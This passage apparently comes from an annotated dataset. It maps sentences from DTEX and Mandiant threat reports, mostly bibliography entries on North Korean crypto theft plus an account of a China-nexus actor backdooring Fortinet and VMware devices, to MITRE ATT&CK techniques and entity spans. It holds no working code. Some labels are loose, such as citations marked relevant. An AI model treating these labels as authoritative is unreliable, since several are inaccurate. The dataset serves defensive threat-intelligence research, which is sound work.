1440, "end": 1446, "label": "Infrastructure_Indicator" }, { "text": "Ethereum ", "start": 1718, "end": 1727, "label": "Infrastructure_Indicator" }, { "text": "Making ", "start": 191, "end": 198, "label": "Action" }, { "text": "Hack ", "start": 1684, "end": 1689, "label": "Action" }, { "text": "Stole ", "start": 1932, "end": 1938, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p56-s416-a24236", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 56, "sentence_id": 416, "context_before": "Addressed to the President of the Security Council,” S/2023/668, https://documents.un.org/ doc/undoc/gen/n23/238/69/pdf/n2323869.pdf Jesse Coghlan, “ZachXBT Claims 21 North Korea Crypto Devs Making $500K a Month,” Cointelegraph, July 25, 2023, Staffing Industry Analysts, “US Departments Warn on North Korean IT Workers, Hold Symposium for IT Staffing Firms,” August 1, 2023, https://www.staffingindustry.com/news/global-daily-news/us-departments-warn-north- korean-it-workers-hold-symposium-it-staffing-firms U.S. Department of the Treasury, “U.S. Sanctions Hundreds of Targets in Response to Russia’s Illegal Annexation of Ukrainian Regions,” September 30, 2022, https://home.treasury.gov/news/press-releases/jy2215 U.S. Department of the Treasury, “Treasury Targets North Korean Weapons Representatives in Russia,” March 1, 2023, https://home.treasury.gov/news/press-releases/jy1498 Chainalysis, “OFAC’s Sanctions on North Korea and What They Mean for the Crypto Industry,” May 26, 2023, https:// CNBC, “North Korean Leader’s Half-Brother Killed in Malaysia: South Korean Media,” February 14, 2017, https://www.\ncnbc.com/2017/02/14/north-korean-leaders-half-brother-killed-in-malaysia-south-korea-media.html 56\nAdam Entous, “North Korea’s Abduction Project,” The New Yorker, February 8, 2024, https://www.newyorker.com/ news/news-desk/north-koreas-abduction-project Jesse Coghlan, “Lazarus Group’s 2024 Pause Was Repositioning for $1.4B Bybit Hack,” Cointelegraph via WORKFORCE TradingView, March 4, 2025, https://www.tradingview.com/news/cointelegraph:7211acb81094b:0-lazarus-group-s- IT 2024-pause-was-repositioning-for-1-4b-bybit-hack/ HIDDEN Leo Schwartz, “North Korea’s Bybit Hack Shows How Hard It Is to Keep Ethereum Safe,” Fortune Crypto, March 4, 2025, https://fortune.com/crypto/2025/03/04/north-korea-bybit-hack-ethereum-safe-dprk-lazarus-group- AND tradertraitor/ Chainalysis, “Crypto Hacking Trends: How North Korea Stole Billions in 2025,” Chainalysis Blog, March 2025, https:// SYNDICATE Commonplace Facts, “Internet in North Korea,” September 26, 2024,", "sentence_text": "Threat Intelligence, “CLASIOPA: Targeting Materials Research Through Cyber Espionage,” accessed April 15, 2025, https://www.security.com/threat-intelligence/clasiopa-materials-research EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targets materials research through cyber espionage", "entities": [ { "text": "Materials Research ", "start": 42, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "Targeting ", "start": 32, "end": 42, "label": "Action" }, { "text": "Cyber Espionage", "start": 69, "end": 84, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p57-s417-01b82e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 417, "context_before": "Threat Intelligence, “CLASIOPA: Targeting Materials Research Through Cyber Espionage,” accessed April 15, 2025, https://www.security.com/threat-intelligence/clasiopa-materials-research EXPOSING", "sentence_text": "Bruce Klingner, “North Korean Cyberattacks: A Dangerous and Evolving Threat,” The Heritage Foundation, April 27, 2021, https://www.heritage.org/asia/report/north-korean-cyberattacks-dangerous-and-evolving-threat Patrick Brzeski, “Walt Disney Characters Make Unauthorized Appearance in North Korean Concert,” The Hollywood Reporter, July 9, 2012, https://www.hollywoodreporter.com/news/general-news/walt-disney-characters-north- korea-dictator-34801-346975/ Nancy Tartaglione, “Disney Characters Shown at North Korea Concert", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p57-s418-3efb8b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 418, "context_before": "Bruce Klingner, “North Korean Cyberattacks: A Dangerous and Evolving Threat,” The Heritage Foundation, April 27, 2021, https://www.heritage.org/asia/report/north-korean-cyberattacks-dangerous-and-evolving-threat Patrick Brzeski, “Walt Disney Characters Make Unauthorized Appearance in North Korean Concert,” The Hollywood Reporter, July 9, 2012, https://www.hollywoodreporter.com/news/general-news/walt-disney-characters-north- korea-dictator-34801-346975/ Nancy Tartaglione, “Disney Characters Shown at North Korea Concert", "sentence_text": "During Kim Jong-Un’s Appearance,” Deadline, July 9, 2012, https://deadline.com/2012/07/disney-characters-north-korea-concert-unauthorized-kim-jong- un-297618/ Emma Chanlett-Avery, North Korea: U.S. Relations, Nuclear Diplomacy, and Internal Situation, Congressional Research Service, December 18, 2015, https://goodtimesweb.org/diplomacy/2015/R41259.pdf Dan Robinson and Anish Agnihotri, “Demystifying the North Korean Threat,” Paradigm, March 19, 2025, https://www.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p57-s419-cbddc4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 419, "context_before": "During Kim Jong-Un’s Appearance,” Deadline, July 9, 2012, https://deadline.com/2012/07/disney-characters-north-korea-concert-unauthorized-kim-jong- un-297618/ Emma Chanlett-Avery, North Korea: U.S. Relations, Nuclear Diplomacy, and Internal Situation, Congressional Research Service, December 18, 2015, https://goodtimesweb.org/diplomacy/2015/R41259.pdf Dan Robinson and Anish Agnihotri, “Demystifying the North Korean Threat,” Paradigm, March 19, 2025, https://www.", "sentence_text": "paradigm.xyz/2025/03/demystifying-the-north-korean-threat\nNorth Korea Leadership Watch, “Mid-Level Managers,” September 13, 2024, https://www.nkleadershipwatch.\norg/2024/09/13/mid-le-managers/\nDaily NK, “Former Spy Student Caught Trying to Flee North Korea,” March 28, 2025, https://www.dailynk.com/ english/former-spy-student-caught-trying-t/ Associated Press, “North Korean Hackers Target South With Online Attacks,” NBC News, May 17, 2011, https://www.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Targets South with online attacks", "entities": [ { "text": "North Korean Hackers", "start": 363, "end": 383, "label": "ThreatActor" }, { "text": "South ", "start": 391, "end": 397, "label": "Infrastructure_Indicator" }, { "text": "Target ", "start": 384, "end": 391, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p57-s420-7c8b3b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 420, "context_before": "paradigm.xyz/2025/03/demystifying-the-north-korean-threat\nNorth Korea Leadership Watch, “Mid-Level Managers,” September 13, 2024, https://www.nkleadershipwatch.\norg/2024/09/13/mid-le-managers/\nDaily NK, “Former Spy Student Caught Trying to Flee North Korea,” March 28, 2025, https://www.dailynk.com/ english/former-spy-student-caught-trying-t/ Associated Press, “North Korean Hackers Target South With Online Attacks,” NBC News, May 17, 2011, https://www.", "sentence_text": "nbcnews.com/id/wbna42998012\nTayvano, “Atomic Wallet Hack – North Korean-Linked Onchain Analysis,” Dune Analytics, accessed April 15, 2025, Tayvano, “BTC Avalanche Bridge – Transaction Visuals and Timeline,” Dune Analytics, accessed April 15, 2025, Tayvano, “Bybit Thorchain Shitshow – DPRK Tracing,” Dune Analytics, accessed April 15, 2025, https://dune.com/ tayvano/bybit-thorchain-shitshow Tayvano, “DPRK TXNs – Transaction Monitoring Dashboard,” Dune Analytics, accessed April 15, 2025, https://dune.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Hacks cryptocurrency wallets and bridges, monitors transactions", "entities": [ { "text": "North Korean-Linked", "start": 59, "end": 78, "label": "ThreatActor" }, { "text": "DPRK ", "start": 285, "end": 290, "label": "ThreatActor" }, { "text": "DPRK ", "start": 402, "end": 407, "label": "ThreatActor" }, { "text": "Bybit Thorchain ", "start": 258, "end": 274, "label": "Infrastructure_Indicator" }, { "text": "Transaction Monitoring ", "start": 414, "end": 437, "label": "Action" }, { "text": "BTC Avalanche Bridge", "start": 149, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "Atomic Wallet", "start": 38, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p57-s421-cce60e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 421, "context_before": "nbcnews.com/id/wbna42998012\nTayvano, “Atomic Wallet Hack – North Korean-Linked Onchain Analysis,” Dune Analytics, accessed April 15, 2025, Tayvano, “BTC Avalanche Bridge – Transaction Visuals and Timeline,” Dune Analytics, accessed April 15, 2025, Tayvano, “Bybit Thorchain Shitshow – DPRK Tracing,” Dune Analytics, accessed April 15, 2025, https://dune.com/ tayvano/bybit-thorchain-shitshow Tayvano, “DPRK TXNs – Transaction Monitoring Dashboard,” Dune Analytics, accessed April 15, 2025, https://dune.", "sentence_text": "WORKFORCE com/tayvano/dprk-txns IT Tayvano, “BingX Flows Associated with DPRK-linked Wallets,” Dune Analytics, accessed April 15, 2025, https://dune.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p57-s422-1ec0dd", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 57, "sentence_id": 422, "context_before": "WORKFORCE com/tayvano/dprk-txns IT Tayvano, “BingX Flows Associated with DPRK-linked Wallets,” Dune Analytics, accessed April 15, 2025, https://dune.", "sentence_text": "HIDDEN com/tayvano/bingx AND Tayvano, “Alphapo Exploit – DPRK Attribution Mapping,” Dune Analytics, accessed April 15, 2025, https://dune.com/ tayvano/alphapo SYNDICATE TRM Labs, Update on DPRK Cyber Activity and Cryptocurrency Theft, January 2025, https://www.trmlabs.com/ resources/reports/update-on-dprk-cyber-activity-and-cryptocurrency-theft CYBER Cheyenne Ligon, “Here’s How North Korea Launders Billions of Stolen Crypto,” CoinDesk, March 7, 2025, https://www.coindesk.com/policy/2025/03/07/here-s-how-north-korea-launders-billions-of-stolen-crypto DPRK’S Jonathan Greig, “North Koreans Begin Initial Laundering of Funds from Bybit Hack,” The Record by Recorded Future,March 8, 2025, https://therecord.media/north-koreans-initial-laundering-bybit-hack EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Exploits platforms, steals cryptocurrency, and launders funds", "entities": [ { "text": "DPRK ", "start": 57, "end": 62, "label": "ThreatActor" }, { "text": "DPRK ", "start": 189, "end": 194, "label": "ThreatActor" }, { "text": "North Koreans", "start": 580, "end": 593, "label": "ThreatActor" }, { "text": "Bybit ", "start": 633, "end": 639, "label": "Infrastructure_Indicator" }, { "text": "Cryptocurrency ", "start": 213, "end": 228, "label": "Infrastructure_Indicator" }, { "text": "Exploit ", "start": 47, "end": 55, "label": "Action" }, { "text": "Laundering ", "start": 608, "end": 619, "label": "Action" }, { "text": "Stolen ", "start": 414, "end": 421, "label": "Action" }, { "text": "DPRK", "start": 556, "end": 560, "label": "ThreatActor" } ] }, { "uid": "mitre-79_mitre_report-p58-s423-436b9a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 58, "sentence_id": 423, "context_before": "HIDDEN com/tayvano/bingx AND Tayvano, “Alphapo Exploit – DPRK Attribution Mapping,” Dune Analytics, accessed April 15, 2025, https://dune.com/ tayvano/alphapo SYNDICATE TRM Labs, Update on DPRK Cyber Activity and Cryptocurrency Theft, January 2025, https://www.trmlabs.com/ resources/reports/update-on-dprk-cyber-activity-and-cryptocurrency-theft CYBER Cheyenne Ligon, “Here’s How North Korea Launders Billions of Stolen Crypto,” CoinDesk, March 7, 2025, https://www.coindesk.com/policy/2025/03/07/here-s-how-north-korea-launders-billions-of-stolen-crypto DPRK’S Jonathan Greig, “North Koreans Begin Initial Laundering of Funds from Bybit Hack,” The Record by Recorded Future,March 8, 2025, https://therecord.media/north-koreans-initial-laundering-bybit-hack EXPOSING", "sentence_text": "Internet Crime Complaint Center (IC3), “Public Service Announcement PSA250123: DPRK-Linked IT Workers and Cryptocurrency Laundering,” January 23, 2025, https://www.ic3.gov/PSA/2025/PSA250123 Ministry of Foreign Affairs of the Republic of Korea, Overview of Sanctions and Measures Against North Korea, accessed April 15, 2025, https://www.mofa.go.kr/eng/wpge/m_25525/contents.do AJ Vicens, “North Korea’s Technical Workers Land Full-Time Jobs Abroad,” CyberScoop, March 2024, https:// cyberscoop.com/north-korea-technical-workers-full-time-jobs/ Radio Free Asia, “North Korean Authorities Order Tech Workers to Ramp Up Industrial Espionage in China,” RFA, July 15, 2016, https://www.rfa.org/english/news/korea/north-korean-authorities-order-tech-workers-to-ramp-up- industrial-espionage-in-china-07152016150820.html Radio Free Asia, “North Korean Authorities Order Tech Workers to Ramp Up Industrial Espionage in China,” RFA, July 15, 2016, https://www.rfa.org/english/news/korea/north-korean-authorities-order-tech-workers-to-ramp-up- industrial-espionage-in-china-07152016150820.html Kevin Helms, “Radiant Capital Hack: How Hackers Used a PDF to Steal $50 Million,” Bitcoin News, March 25, 2025, Tayvano (@tayvano_), “North Korea Is Already Moving Funds from the Radiant Hack,” X (formerly Twitter), March 25, 2025, https://x.com/tayvano_/status/1905761068741459974 Chainalysis, “OFAC’s Sanctions on North Korea and What They Mean for the Crypto Industry,” Chainalysis Blog, May 26, 2023, https://www.chainalysis.com/blog/ofac-north-korea-sanctions-may-2023/ U.S. Department of the Treasury, “Treasury Targets North Korean Weapons Representatives in Russia,” March 1, 2023, https://home.treasury.gov/news/press-releases/jy1498 Baek, Jieun.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1591", "name": "Gather Victim Org Information" }, { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Conducts cryptocurrency laundering, places technical workers abroad, performs industrial espionage, and steals funds via PDF exploits", "entities": [ { "text": "DPRK-Linked IT Workers", "start": 79, "end": 101, "label": "ThreatActor" }, { "text": "North Korean Authorities ", "start": 563, "end": 588, "label": "ThreatActor" }, { "text": "North Korean", "start": 563, "end": 575, "label": "ThreatActor" }, { "text": "Radiant Capital", "start": 1099, "end": 1114, "label": "Infrastructure_Indicator" }, { "text": "PDF ", "start": 1140, "end": 1144, "label": "Infrastructure_Indicator" }, { "text": "China", "start": 642, "end": 647, "label": "Infrastructure_Indicator" }, { "text": "China", "start": 912, "end": 917, "label": "Infrastructure_Indicator" }, { "text": "Cryptocurrency Laundering", "start": 106, "end": 131, "label": "Action" }, { "text": " Land Full-Time Jobs", "start": 421, "end": 441, "label": "Action" }, { "text": "Industrial Espionage", "start": 618, "end": 638, "label": "Action" }, { "text": "Industrial Espionage", "start": 888, "end": 908, "label": "Action" }, { "text": "Steal ", "start": 1147, "end": 1153, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p58-s424-23faeb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 58, "sentence_id": 424, "context_before": "Internet Crime Complaint Center (IC3), “Public Service Announcement PSA250123: DPRK-Linked IT Workers and Cryptocurrency Laundering,” January 23, 2025, https://www.ic3.gov/PSA/2025/PSA250123 Ministry of Foreign Affairs of the Republic of Korea, Overview of Sanctions and Measures Against North Korea, accessed April 15, 2025, https://www.mofa.go.kr/eng/wpge/m_25525/contents.do AJ Vicens, “North Korea’s Technical Workers Land Full-Time Jobs Abroad,” CyberScoop, March 2024, https:// cyberscoop.com/north-korea-technical-workers-full-time-jobs/ Radio Free Asia, “North Korean Authorities Order Tech Workers to Ramp Up Industrial Espionage in China,” RFA, July 15, 2016, https://www.rfa.org/english/news/korea/north-korean-authorities-order-tech-workers-to-ramp-up- industrial-espionage-in-china-07152016150820.html Radio Free Asia, “North Korean Authorities Order Tech Workers to Ramp Up Industrial Espionage in China,” RFA, July 15, 2016, https://www.rfa.org/english/news/korea/north-korean-authorities-order-tech-workers-to-ramp-up- industrial-espionage-in-china-07152016150820.html Kevin Helms, “Radiant Capital Hack: How Hackers Used a PDF to Steal $50 Million,” Bitcoin News, March 25, 2025, Tayvano (@tayvano_), “North Korea Is Already Moving Funds from the Radiant Hack,” X (formerly Twitter), March 25, 2025, https://x.com/tayvano_/status/1905761068741459974 Chainalysis, “OFAC’s Sanctions on North Korea and What They Mean for the Crypto Industry,” Chainalysis Blog, May 26, 2023, https://www.chainalysis.com/blog/ofac-north-korea-sanctions-may-2023/ U.S. Department of the Treasury, “Treasury Targets North Korean Weapons Representatives in Russia,” March 1, 2023, https://home.treasury.gov/news/press-releases/jy1498 Baek, Jieun.", "sentence_text": "North Korea’s Hidden Revolution: How the Information Underground Is Transforming a Closed Society.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p58-s425-9e51ee", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 58, "sentence_id": 425, "context_before": "North Korea’s Hidden Revolution: How the Information Underground Is Transforming a Closed Society.", "sentence_text": "New Haven: Yale University Press, 2016.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p58-s426-89c5f6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 58, "sentence_id": 426, "context_before": "New Haven: Yale University Press, 2016.", "sentence_text": "Breach Was Actually Two Linked Supply Chain Attacks,” Wired, April 20, 2023, IT Insikt Group, “North Korea’s Cyber Strategy: An Initial Analysis,” Recorded Future, June 2023, https://www.recordedfuture.com/research/north-koreas-cyber-strategy AND Pyongyang Papers, “Moonstone Sleet & Sin Chong Min,” accessed April 15, 2025, https://pyongyangpapers.com/moonstone-sleet-sin-chong-min/ Council on Foreign Relations, “Moonstone Sleet,” Cyber Operations Tracker, accessed April 15, 2025, https://www.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p58-s427-d3c228", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 58, "sentence_id": 427, "context_before": "Breach Was Actually Two Linked Supply Chain Attacks,” Wired, April 20, 2023, IT Insikt Group, “North Korea’s Cyber Strategy: An Initial Analysis,” Recorded Future, June 2023, https://www.\nrecordedfuture.com/research/north-koreas-cyber-strategy AND\nPyongyang Papers, “Moonstone Sleet & Sin Chong Min,” accessed April 15, 2025, https://pyongyangpapers.com/ moonstone-sleet-sin-chong-min/ SYNDICATE Council on Foreign Relations, “Moonstone Sleet,” Cyber Operations Tracker, accessed April 15, 2025, https://www.", "sentence_text": "CYBER cfr.org/cyber-operations/moonstone-sleet Aja Romano, “The 2014 Sony Hacks, Explained,” Vox, December 19, 2014, https://www.vox.com/2014/12/19/7420113/ DPRK’S sony-hack-explained EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p59-s428-f0e71e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 59, "sentence_id": 428, "context_before": "CYBER cfr.org/cyber-operations/moonstone-sleet Aja Romano, “The 2014 Sony Hacks, Explained,” Vox, December 19, 2014, https://www.vox.com/2014/12/19/7420113/ DPRK’S sony-hack-explained EXPOSING", "sentence_text": "newyorker.com/magazine/2022/05/02/the-incredible-rise-of-north-koreas-hacking-army\nChad O’Carroll, “Lifestyles of the Loyalists: How North Korea’s Upper Classes Live,” NK News, September 1, 2021, James Pearson, “Inside the Kim Family Business: Office 39,” NK News, July 8, 2014, https://www.nknews.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p59-s429-df4d4b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 59, "sentence_id": 429, "context_before": "newyorker.com/magazine/2022/05/02/the-incredible-rise-of-north-koreas-hacking-army\nChad O’Carroll, “Lifestyles of the Loyalists: How North Korea’s Upper Classes Live,” NK News, September 1, 2021, James Pearson, “Inside the Kim Family Business: Office 39,” NK News, July 8, 2014, https://www.nknews.", "sentence_text": "org/2014/07/inside-the-kim-family-business-office-39/\nColin Zwirko, “How North Korea Compels Citizens to Spy on Each Other with New Surveillance Law,” NK Pro (NK News), March 8, 2023, https://www.nknews.org/pro/how-north-korea-compels-citizens-to-spy-on-each-other- with-new-surveillance-law/ Nicholas Hamisevicz, “The Jig Is Not Yet Up: Kim Jong Un Turns to Cyber Crime,” Korea Economic Institute of America (KEIA), November 15, 2022, https://keia.org/the-peninsula/the-jig-is-not-yet-up-kim-jong-un-turns-to- cyber-crime/ Rekt News, “The Impersonator,” February 9, 2024, https://rekt.news/the-impersonator MSN News, “North Korea Unveils AI Suicide Drones and AWACS Plane,” June 27, 2023, https://www.msn.com/en-us/ news/world/north-korea-unveils-ai-suicide-drones-and-awacs-plane/ar-AA1C1Te5 WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p60-s430-87af39", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 60, "sentence_id": 430, "context_before": "org/2014/07/inside-the-kim-family-business-office-39/\nColin Zwirko, “How North Korea Compels Citizens to Spy on Each Other with New Surveillance Law,” NK Pro (NK News), March 8, 2023, https://www.nknews.org/pro/how-north-korea-compels-citizens-to-spy-on-each-other- with-new-surveillance-law/ Nicholas Hamisevicz, “The Jig Is Not Yet Up: Kim Jong Un Turns to Cyber Crime,” Korea Economic Institute of America (KEIA), November 15, 2022, https://keia.org/the-peninsula/the-jig-is-not-yet-up-kim-jong-un-turns-to- cyber-crime/ Rekt News, “The Impersonator,” February 9, 2024, https://rekt.news/the-impersonator MSN News, “North Korea Unveils AI Suicide Drones and AWACS Plane,” June 27, 2023, https://www.msn.com/en-us/ news/world/north-korea-unveils-ai-suicide-drones-and-awacs-plane/ar-AA1C1Te5 WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "To request a threat briefing with DTEX on the DPRK, visit dtexsystems.com/exposing-dprk/#dprk-contact", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p60-s431-51561f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 60, "sentence_id": 431, "context_before": "To request a threat briefing with DTEX on the DPRK, visit dtexsystems.com/exposing-dprk/#dprk-contact", "sentence_text": "To access the latest DPRK-linked behavioral indicators and email IOCs, visit dtexsystems.com/resources/i3-threat-advisory-inside-the-dprk/ ABOUT DTEX SYSTEMS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p60-s432-20f5c6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 60, "sentence_id": 432, "context_before": "To access the latest DPRK-linked behavioral indicators and email IOCs, visit dtexsystems.com/resources/i3-threat-advisory-inside-the-dprk/ ABOUT DTEX SYSTEMS", "sentence_text": "As the trusted leader of insider risk management, DTEX transforms enterprise security by displacing reactive tools with a proactive solution that stops insider risks from becoming data breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s1-c14f74", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "We often observe cyber espionage operators exploiting zero-day vulnerabilities and deploying custom malware to Internet-exposed systems as an initial attack vector.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploiting zero-day vulnerabilities and deploying custom malware to Internet-exposed systems", "entities": [ { "text": "cyber espionage operators", "start": 17, "end": 42, "label": "ThreatActor" }, { "text": "exploiting ", "start": 43, "end": 54, "label": "Action" }, { "text": "deploying ", "start": 83, "end": 93, "label": "Action" }, { "text": "custom malware", "start": 93, "end": 107, "label": "MalwareTool" }, { "text": "Internet-exposed systems", "start": 111, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "zero-day vulnerabilities", "start": 54, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s2-7459fa", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "We often observe cyber espionage operators exploiting zero-day vulnerabilities and deploying custom malware to Internet-exposed systems as an initial attack vector.", "sentence_text": "In this blog post, we describe scenarios where a suspected China-nexus threat actor likely already had access to victim environments, and then deployed backdoors onto Fortinet and VMware solutions as a means of maintaining persistent access to the environments.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Deployed backdoors onto Fortinet and VMware solutions", "entities": [ { "text": "suspected China-nexus threat actor", "start": 49, "end": 83, "label": "ThreatActor" }, { "text": "backdoors ", "start": 152, "end": 162, "label": "MalwareTool" }, { "text": "Fortinet ", "start": 167, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "VMware solutions ", "start": 180, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 143, "end": 152, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s3-b2a729", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "In this blog post, we describe scenarios where a suspected China-nexus threat actor likely already had access to victim environments, and then deployed backdoors onto Fortinet and VMware solutions as a means of maintaining persistent access to the environments.", "sentence_text": "This involved the use of a local zero-day vulnerability in FortiOS (CVE-2022-41328) and deployment of multiple custom malware families on Fortinet and VMware systems.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" }, { "id": "T1211", "name": "Exploitation for Defense Evasion" } ], "procedure": "Used a local zero-day vulnerability in FortiOS and deployed custom malware", "entities": [ { "text": "custom malware families ", "start": 111, "end": 135, "label": "MalwareTool" }, { "text": "FortiOS ", "start": 59, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "CVE-2022-41328", "start": 68, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "VMware systems", "start": 151, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "Fortinet ", "start": 138, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "use ", "start": 18, "end": 22, "label": "Action" }, { "text": "deployment ", "start": 88, "end": 99, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s4-2a7eb8", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "This involved the use of a local zero-day vulnerability in FortiOS (CVE-2022-41328) and deployment of multiple custom malware families on Fortinet and VMware systems.", "sentence_text": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate (firewall), FortiManager (centralized management solution), and FortiAnalyzer (log management, analytics, and reporting platform).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deployed malware across multiple Fortinet solutions (FortiGate, FortiManager, FortiAnalyzer)", "entities": [ { "text": "malware ", "start": 103, "end": 111, "label": "MalwareTool" }, { "text": "FortiManager ", "start": 178, "end": 191, "label": "Infrastructure_Indicator" }, { "text": "Fortinet solutions", "start": 127, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "FortiGate ", "start": 156, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer ", "start": 230, "end": 244, "label": "Infrastructure_Indicator" }, { "text": "investigated ", "start": 55, "end": 68, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s5-326a98", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate (firewall), FortiManager (centralized management solution), and FortiAnalyzer (log management, analytics, and reporting platform).", "sentence_text": "The following steps generally describe the actions the threat actor took:\nUtilized a local directory traversal zero-day (CVE-2022-41328) exploit to write files to FortiGate firewall disks outside of the normal bounds allowed with shell access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Utilized a local directory traversal zero-day exploit to write files to FortiGate firewall disks", "entities": [ { "text": "threat actor", "start": 55, "end": 67, "label": "ThreatActor" }, { "text": " FortiGate firewall disks", "start": 162, "end": 187, "label": "Infrastructure_Indicator" }, { "text": "CVE-2022-41328", "start": 121, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "Utilized ", "start": 74, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "write files", "start": 148, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s6-eb6293", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "The following steps generally describe the actions the threat actor took:\nUtilized a local directory traversal zero-day (CVE-2022-41328) exploit to write files to FortiGate firewall disks outside of the normal bounds allowed with shell access.", "sentence_text": "Maintained persistent access with Super Administrator privileges within FortiGate Firewalls through ICMP port knocking Circumvented firewall rules active on FortiManager devices with a passive traffic redirection utility, enabling continued connections to persistent backdoors with Super Administrator privileges Established persistence on FortiManager and FortiAnalyzer devices through a custom API endpoint created within the device Disabled OpenSSL 